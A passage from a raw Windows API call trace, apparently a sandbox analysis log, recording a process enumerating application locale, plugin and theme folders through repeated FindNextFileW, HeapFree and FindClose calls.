lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.581] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.581] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.581] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0175.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.582] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0175.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.583] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0175.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.583] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02e54fa, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02e54fa, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02e54fa, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0175.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.584] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02e54fa, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02e54fa, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02e54fa, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0175.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.586] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0175.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.587] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0175.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.587] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02e54fa, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02e54fa, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02e54fa, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0175.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.587] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0175.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.588] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf02bf3c0, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02bf3c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02bf3c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0175.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.588] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0175.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.589] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02e54fa, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02e54fa, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02e54fa, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0175.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.590] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02e54fa, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02e54fa, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02e54fa, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0175.590] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.590] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x399, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.591] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rhp", cAlternateFileName="")) returned 0 [0175.591] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.591] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0175.591] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0175.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.592] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02bf3c0, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02bf3c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02bf3c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.592] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.592] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="createpdfupsell-app", cAlternateFileName="CREATE~1")) returned 1 [0175.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.594] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.599] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0175.599] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.599] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0175.599] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.599] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.671] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.671] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.671] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.671] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.672] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.672] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.672] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.685] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0175.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.686] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0175.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.706] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, 